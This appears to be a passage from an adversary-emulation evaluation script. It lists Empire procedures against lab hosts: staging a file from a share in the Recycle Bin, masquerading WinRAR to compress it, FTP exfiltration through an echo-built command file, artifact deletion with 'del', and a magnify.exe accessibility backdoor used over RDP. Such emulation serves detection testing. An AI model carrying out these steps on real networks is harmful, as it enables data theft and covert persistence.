i. Empire: 'Get-ChildItem' via PowerShell to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)

18.B.1 Collection

Data Staged, Data from Network Shared Drive

i. Empire: 'copy' via PowerShell staged a file (Shockwave_network.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5) in the Recycle Bin (C:\$Recycle.Bin) on CodeRed (10.0.1.5)

Step 19: Exfiltration

19.A.1 Defense Evasion

Masquerading, Remote File Copy

i. Empire: File dropped to disk is a renamed copy of the WinRAR binary

19.B.1 Exfiltration

Data Compressed, Data Encrypted, Masquerading

i. Empire: Executed binary (recycler.exe) created compressed archive (old.rar) of previously collected file

19.C.1 Exfiltration

Exfiltration Over Alternative Protocol

i. Empire: Sequence of 'echo' commands via PowerShell to populate commands in a text file (ftp.txt), which is then executed by FTP to exfil data through a network connection separate from the existing C2 channel

19.D.1 Defense Evasion

File Deletion

i. Empire: 'del C:\"$"Recycle.bin\old.rar'

19.D.2 Defense Evasion

File Deletion

i. Empire: 'del recycler.exe'

Step 20: Execution of Persistence

20.A.1 Persistence, Privilege Escalation

Accessibility Features, Remote Desktop Protocol

i. magnify.exe previously overwritten by cmd.exe launched through RDP connection made to Creeper (10.0.0.4)

20.B.1 Discovery

System Owner / User Discovery

i. Executed 'whoami' via cmd persistence mechanism through RDP connection made to Creeper (10.0.0.4)